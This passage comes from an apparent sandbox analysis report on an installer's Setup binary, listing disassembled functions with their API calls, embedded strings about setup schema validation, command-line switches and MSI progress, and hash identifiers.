                                                              • a valid UninstallCommandLine is required., xrefs: 6C92804B
                                                              • has invalid LogFileHint, xrefs: 6C928182
                                                              • schema validation failure: , xrefs: 6C92816D
                                                              • schema validation failure: The InstallCommandLine, UninstallCommandLind and RepairCommandLine of an ExeBase of MsuPackage like , xrefs: 6C928256
                                                              • must be empty., xrefs: 6C92826B
                                                              • ParameterInfo.xml, xrefs: 6C927F63, 6C928026, 6C92815D, 6C928246, 6C92835E
                                                              • schema validation failure. URL, HashValue and DownLoadSize attributes are not valid for LocalExe type like , xrefs: 6C92836E
                                                              • ", xrefs: 6C9283BD
                                                              • When Rollback is true for item , xrefs: 6C928036
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: Exception@8H_prolog3Throw
                                                              • String ID: a valid UninstallCommandLine is required.$ has invalid LogFileHint$ must be empty.$"$ParameterInfo.xml$When Rollback is true for item $schema validation failure. URL, HashValue and DownLoadSize attributes are not valid for LocalExe type like $schema validation failure: $schema validation failure: The InstallCommandLine, UninstallCommandLind and RepairCommandLine of an ExeBase of MsuPackage like
                                                              • API String ID: 3670251406-573577147
                                                              • Opcode ID: f0c1c9debb50fb1e462fa9719abc3a2a765183853117145d2e139069b3ea5b8d
                                                              • Instruction ID: bb9493dbeb169fa03a77f9e5d98fefd205e55a52cc22373dffa691ae42732d26
                                                              • Opcode Fuzzy Hash: f0c1c9debb50fb1e462fa9719abc3a2a765183853117145d2e139069b3ea5b8d
                                                              • Instruction Fuzzy Hash: DED1C132901248DFDB14CBF8C944BDDB7B8AF25328F148256E060B7B81D734EA49CBA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                                • Part of subcall function 6C94BE94: _free.LIBCMT ref: 6C94BEBC
                                                                • Part of subcall function 6C94BE94: _free.LIBCMT ref: 6C94BECD
                                                              • GetCommandLineW.KERNEL32(512AC3CC,?,?,00000000,?,?,?,?,?,ParameterInfo.xml,?,?,?,00000000,?,?), ref: 6C946E16
                                                                • Part of subcall function 6C913E77: __EH_prolog3.LIBCMT ref: 6C913E7E
                                                                • Part of subcall function 6C948FC3: _calloc.LIBCMT ref: 6C948FE1
                                                                • Part of subcall function 6C94EBE9: __recalloc.LIBCMT ref: 6C94EBFA
                                                              Strings
                                                              • " switch cannot be disabled, but is specified in the DisabledCommandLineSwitches., xrefs: 6C94728A
                                                              • " switch is disallowed for this package., xrefs: 6C947064
                                                              • " switch has been disallowed for this package., xrefs: 6C947004
                                                              • The ", xrefs: 6C947051, 6C947277
                                                              • quiet, xrefs: 6C946F35
                                                              • Command-line option error: the ", xrefs: 6C946FF1
                                                              • Command-line option error: unrecognized switch(es) ", xrefs: 6C94716B
                                                              • Setup, xrefs: 6C946E7D
                                                              • Unrecognized switch(es) ", xrefs: 6C9471CF
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: _free$CommandH_prolog3Line__recalloc_calloc
                                                              • String ID: " switch cannot be disabled, but is specified in the DisabledCommandLineSwitches.$" switch has been disallowed for this package.$" switch is disallowed for this package.$Command-line option error: the "$Command-line option error: unrecognized switch(es) "$Setup$The "$Unrecognized switch(es) "$quiet
                                                              • API String ID: 1533339410-3701387627
                                                              • Opcode ID: 93d4a4252b620e5171147be8cd95cbb3be53704c4253e22a8646d16679a8241b
                                                              • Instruction ID: 95984db385e565e824dab4e0382175ac648f62d8d65eb63c8cf31346fbf51081
                                                              • Opcode Fuzzy Hash: 93d4a4252b620e5171147be8cd95cbb3be53704c4253e22a8646d16679a8241b
                                                              • Instruction Fuzzy Hash: A0E15C721083849FD310CF68C840B8EBBE4BFA5358F148A59F594D7B91DB70E949CB96
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C93CC37
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                                • Part of subcall function 6C93B9EE: __EH_prolog3.LIBCMT ref: 6C93B9F5
                                                              • GetTickCount.KERNEL32 ref: 6C93CE49
                                                                • Part of subcall function 6C9139AD: __EH_prolog3.LIBCMT ref: 6C9139B4
                                                              Strings
                                                              • INSTALLMESSAGE_PROGRESS [%s] (Progress Report: iProgress=%d) Negative progress ignored!!, xrefs: 6C93CD48
                                                              • INSTALLMESSAGE_PROGRESS [%s] (Progress Report: iProgress=%d), xrefs: 6C93CD3B
                                                              • INSTALLMESSAGE_PROGRESS [%s] (Master Reset: tickCount=%d range=%d), xrefs: 6C93CE56
                                                              • INSTALLMESSAGE_PROGRESS - Action Data message received, but step size is zero, xrefs: 6C93CCF0
                                                              • INSTALLMESSAGE_PROGRESS [%s] (Action Info), xrefs: 6C93CD96
                                                              • INSTALLMESSAGE_PROGRESS [%s] (Progress Addition), xrefs: 6C93CCB2
                                                              • INSTALLMESSAGE_PROGRESS [%s] (Action Data: iProgress=%d iStep=%d), xrefs: 6C93CD0E
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$CountTick
                                                              • String ID: INSTALLMESSAGE_PROGRESS - Action Data message received, but step size is zero$INSTALLMESSAGE_PROGRESS [%s] (Action Data: iProgress=%d iStep=%d)$INSTALLMESSAGE_PROGRESS [%s] (Action Info)$INSTALLMESSAGE_PROGRESS [%s] (Master Reset: tickCount=%d range=%d)$INSTALLMESSAGE_PROGRESS [%s] (Progress Addition)$INSTALLMESSAGE_PROGRESS [%s] (Progress Report: iProgress=%d)$INSTALLMESSAGE_PROGRESS [%s] (Progress Report: iProgress=%d) Negative progress ignored!!
                                                              • API String ID: 194692712-1811215275
                                                              • Opcode ID: fac569d3d931ad3a2bc1544afb2d1c57489a142bc8fcbbe1c63ef2a42f827066
                                                              • Instruction ID: 17ddb53baebd0114dd06de16b61149e057b8d59ec4235f3743925ce5f2da0d55
                                                              • Opcode Fuzzy Hash: fac569d3d931ad3a2bc1544afb2d1c57489a142bc8fcbbe1c63ef2a42f827066
                                                              • Instruction Fuzzy Hash: 4E71C271600A79BFE711AB68C842BA9BB78FF15318F105615F628DBE90D730E865CBD0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C964D46
                                                                • Part of subcall function 6C968859: SysStringByteLen.OLEAUT32(00000000), ref: 6C968860
                                                                • Part of subcall function 6C968859: SysAllocStringByteLen.OLEAUT32(?,00000000), ref: 6C968869
                                                              • CoInitialize.OLE32(00000000), ref: 6C964D5F
                                                              • CoCreateInstance.OLE32(6C90A974,00000000,00000017,6C90A9A4,?,?,?,00000000), ref: 6C964D7D
                                                              • SysAllocString.OLEAUT32(.//MsiXmlBlob), ref: 6C964DE2
                                                              • SysFreeString.OLEAUT32(00000000), ref: 6C964E1A
                                                              • SysFreeString.OLEAUT32(?), ref: 6C964E7E
                                                                • Part of subcall function 6C968E8C: __CxxThrowException@8.LIBCMT ref: 6C968EA0
                                                              • CoUninitialize.OLE32(?,?,00000000), ref: 6C964ECA
                                                              • SysFreeString.OLEAUT32(6C90970C), ref: 6C964ED3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: String$Free$AllocByte$CreateException@8H_prolog3InitializeInstanceThrowUninitialize
                                                              • String ID: .//MsiXmlBlob
                                                              • API String ID: 4093593479-2641887801
                                                              • Opcode ID: 9fa645851fa79315da17b4b505bd84aee2aa070beeb6810970192bff513fd5c5
                                                              • Instruction ID: 95d4db5e455d6ad0dd96aa9326dca329c63519975631544a83dc2a1b9973bba4
                                                              • Opcode Fuzzy Hash: 9fa645851fa79315da17b4b505bd84aee2aa070beeb6810970192bff513fd5c5
                                                              • Instruction Fuzzy Hash: 72519070A01259DFDF01CBE4C998AEEBBB9BF59708F248458E011FB681C775DA45CBA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(msi.dll,MsiSetExternalUIRecord,512AC3CC,?,?,?,?,ParameterInfo.xml,?,?,00000738,6C94FA6E,?,6C90A794,02642228), ref: 6C95CF07
                                                              • GetProcAddress.KERNEL32(00000000), ref: 6C95CF0E
                                                              Strings
                                                              • msi.dll, xrefs: 6C95CF02
                                                              • MsiSetExternalUIRecord, xrefs: 6C95CEFD
                                                              • IUiFactory::CreateMsi31RequiredDialog() failed with error hr = %d, xrefs: 6C95CF73
                                                              • MSI31, xrefs: 6C95CF9E
                                                              • CreateMsi31RequiredDialog, xrefs: 6C95CF59
                                                              • Windows Installer version is less than 3.1, xrefs: 6C95CF28
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: AddressHandleModuleProc
                                                              • String ID: CreateMsi31RequiredDialog$IUiFactory::CreateMsi31RequiredDialog() failed with error hr = %d$MSI31$MsiSetExternalUIRecord$Windows Installer version is less than 3.1$msi.dll
                                                              • API String ID: 1646373207-1012198820
                                                              • Opcode ID: 05fc729852a04d19974ed0b1629aae78924e1e5a625c83d336660fc2805fbb8a
                                                              • Instruction ID: 0575e1cee65dc20781981750fb9c735a31a5f94dde37647529a71a6a244a87b4
                                                              • Opcode Fuzzy Hash: 05fc729852a04d19974ed0b1629aae78924e1e5a625c83d336660fc2805fbb8a
                                                              • Instruction Fuzzy Hash: 52415CB5608341EFC710DF64D888E5ABBE8FB99264F004A2DF955C3B51DB35D908CBA2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C927C26
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                              • __CxxThrowException@8.LIBCMT ref: 6C927DCC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$Exception@8Throw
                                                              • String ID: Cartman$ExeType$HotIron$IronMan$LocalExe$MsuPackage
                                                              • API String ID: 2489616738-3730881327
                                                              • Opcode ID: 74323c674a0b8e524e4f29186dbc00093648e7f9289b59c6fe60b20b52f31ab5
                                                              • Instruction ID: 51af0224593eed145052f5ab7f7bb0fea5ebd765dc8d75c87921e2306f13695c
                                                              • Opcode Fuzzy Hash: 74323c674a0b8e524e4f29186dbc00093648e7f9289b59c6fe60b20b52f31ab5
                                                              • Instruction Fuzzy Hash: 2D51D6306192458FCB08CFE9C8816AD7BF8BF16368B244229E465E7BD0D734C945CBA8
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C931EC6
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                              • __CxxThrowException@8.LIBCMT ref: 6C93202D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$Exception@8Throw
                                                              • String ID: Continue$OnSubFailureAction$ParameterInfo.xml$Rollback$Stop$schema validation failure: invalid attribute value for - OnSubFailureAction
                                                              • API String ID: 2489616738-3344869707
                                                              • Opcode ID: dacb51695d79899c8a157bd57cdd9b3ecf6ce733f21238648b88c9df58db266b
                                                              • Instruction ID: 99e07ad74ada2c6734072cef4b97c94086124ccf38faca5b94f270bcf94b55b4
                                                              • Opcode Fuzzy Hash: dacb51695d79899c8a157bd57cdd9b3ecf6ce733f21238648b88c9df58db266b
                                                              • Instruction Fuzzy Hash: 8741B3319001099BDB04DBE8CD41BEE77BDAF36318F144559E024E7F80DB30DA098BA6
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C926F7A
                                                                • Part of subcall function 6C948608: __wcsicoll.LIBCMT ref: 6C948626
                                                              • __CxxThrowException@8.LIBCMT ref: 6C927087
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: Exception@8H_prolog3Throw__wcsicoll
                                                              • String ID: False$ParameterInfo.xml$True$false$schema validation failure: invalid IgnoreDownloadFailure attribute value$true
                                                              • API String ID: 1238845444-4159781073
                                                              • Opcode ID: 8143eb1980b0262e7d2ef4aedc18070349fb61c0cafc16537d68e550bc39a574
                                                              • Instruction ID: 6de4a0f6689a801c0a27cf78c68f95490aca254a5de03b6f7a0d4a71a240489c
                                                              • Opcode Fuzzy Hash: 8143eb1980b0262e7d2ef4aedc18070349fb61c0cafc16537d68e550bc39a574
                                                              • Instruction Fuzzy Hash: E631AF32914208AFDB14DFA8C901BDE77B86F35358F148659E024EBF80DB34DA19CBA4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 0x%x$Crash$HKLM\Software\Microsoft\Internet Explorer\Registration\DigitalProductID$VSSetup
                                                              • API String ID: 0-732999933
                                                              • Opcode ID: de96577ba69704f0e11b21332087ed12e143f971e0a88532db7eafd88ed01dd3
                                                              • Instruction ID: f9c4363d769d94dd6daa34808d3ca660d4c1b800dd1b4773969114289e6f2633
                                                              • Opcode Fuzzy Hash: de96577ba69704f0e11b21332087ed12e143f971e0a88532db7eafd88ed01dd3
                                                              • Instruction Fuzzy Hash: E222A3712083818FD724CF68C840B9EB7E5BFA5318F144A1EF59897B91CB70D958CBA6
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C958C62
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                              • lstrlenW.KERNEL32(</MsiXmlBlob>,</MsiXmlBlob>,512AC3CC,<MsiXmlBlob,?,?,00000008,6C9580B1,?,?,00000000,6C9552B8,00000002,-000000F4,?,00000002), ref: 6C958CCC
                                                              • SysAllocString.OLEAUT32(?), ref: 6C958D1D
                                                              • __EH_prolog3.LIBCMT ref: 6C958D43
                                                              • #270.MSI(?,00000000,00000007,00000007,00000000,00000010,00000000,00000000,00000000,00000000), ref: 6C958D91
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$#270AllocStringlstrlen
                                                              • String ID: </MsiXmlBlob>$<MsiXmlBlob
                                                              • API String ID: 2868861991-3177253548
                                                              • Opcode ID: db5167eb7bb92c295acd7769d114e8c706671580a5ba5427f6eb3790388a183a
                                                              • Instruction ID: f06049f4574eeb23ce8671466ed8c4fd1f7d2961e7c279ca7fb5478c022e1bf1
                                                              • Opcode Fuzzy Hash: db5167eb7bb92c295acd7769d114e8c706671580a5ba5427f6eb3790388a183a
                                                              • Instruction Fuzzy Hash: 67418F71601109EFDB18DF64C8809ED77B9BF61328F14861AE825DBB80D730DA19CBA4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C926E2F
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                                • Part of subcall function 6C948608: __wcsicoll.LIBCMT ref: 6C948626
                                                              • __CxxThrowException@8.LIBCMT ref: 6C926F68
                                                              Strings
                                                              • schema validation failure: invalid IgnoreDownloadFailure attribute value, xrefs: 6C926EDB
                                                              • true, xrefs: 6C926E83
                                                              • ParameterInfo.xml, xrefs: 6C926EE9
                                                              • false, xrefs: 6C926E95
                                                              • IgnoreDownloadFailure, xrefs: 6C926E38
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$Exception@8Throw__wcsicoll
                                                              • String ID: IgnoreDownloadFailure$ParameterInfo.xml$false$schema validation failure: invalid IgnoreDownloadFailure attribute value$true
                                                              • API String ID: 3031948457-1650268905
                                                              • Opcode ID: dfb322b197c3e3d5cb4da59ef63f9629c12b9e457d7b2f9e92f98498b94c9c8d
                                                              • Instruction ID: 9918958a109525bb9672669183d6c46dd91d245a57621f550c82b31b33f71ec4
                                                              • Opcode Fuzzy Hash: dfb322b197c3e3d5cb4da59ef63f9629c12b9e457d7b2f9e92f98498b94c9c8d
                                                              • Instruction Fuzzy Hash: 1441A371900109EFDB14DBB8C945BEE77B86F25318F148659E025EBF80DB34DA09CB65
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: Exception@8H_prolog3Throw
                                                              • String ID: Bad product drive hint type!$ComponentHint$No product drive hints found!$ParameterInfo.xml$RegKeyHint
                                                              • API String ID: 3670251406-217397854
                                                              • Opcode ID: ec96f7a5638cc191de77927f7619e3b64d4b237a0aa159e1ccbae0addf3235eb
                                                              • Instruction ID: 94862e584d750abb9017cc3dca27a18ab6799090e1289e63c2ba569643df6310
                                                              • Opcode Fuzzy Hash: ec96f7a5638cc191de77927f7619e3b64d4b237a0aa159e1ccbae0addf3235eb
                                                              • Instruction Fuzzy Hash: 42319371905249EFCB00CFE8C980ADDBBB9BF25318F248559E025E7B40D730DA09CB60
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C965F14
                                                              • GetProcAddress.KERNEL32(00000006,GetProcessImageFileNameW), ref: 6C965F24
                                                              • GetLastError.KERNEL32 ref: 6C965F32
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                                • Part of subcall function 6C948380: __EH_prolog3.LIBCMT ref: 6C948387
                                                                • Part of subcall function 6C948C24: __EH_prolog3.LIBCMT ref: 6C948C2B
                                                                • Part of subcall function 6C94FF21: _wcsnlen.LIBCMT ref: 6C94FF54
                                                                • Part of subcall function 6C94FF21: _memcpy_s.LIBCMT ref: 6C94FF8A
                                                                • Part of subcall function 6C9187EC: __EH_prolog3.LIBCMT ref: 6C9187F3
                                                              • __CxxThrowException@8.LIBCMT ref: 6C965FE9
                                                                • Part of subcall function 6C9714AA: KiUserExceptionDispatcher.NTDLL(?,?,6C96C129,00000C00,?,?,?,?,6C96C129,00000C00,6C98BA3C,6C9A76D4,00000C00,00000020,6C94F845,?), ref: 6C9714EC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$AddressDispatcherErrorExceptionException@8LastProcThrowUser_memcpy_s_wcsnlen
                                                              • String ID: in $GetProcAddress looking for $GetProcessImageFileNameW
                                                              • API String ID: 3164256213-2471920563
                                                              • Opcode ID: 8fe9068cd9f45bb70eb51ca63670071639bad0d0799cf006d44fb4afe4700a2b
                                                              • Instruction ID: b22a7ccce4bdba1dd0a3826ab07c676515b226a0f4edb5358891d08dcde7ca7b
                                                              • Opcode Fuzzy Hash: 8fe9068cd9f45bb70eb51ca63670071639bad0d0799cf006d44fb4afe4700a2b
                                                              • Instruction Fuzzy Hash: 40216672901149ABDF14DBE8DD44BEEB7B8AF29318F144259E110E7A80D734DA18C7B9
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C914CB9
                                                                • Part of subcall function 6C948380: __EH_prolog3.LIBCMT ref: 6C948387
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
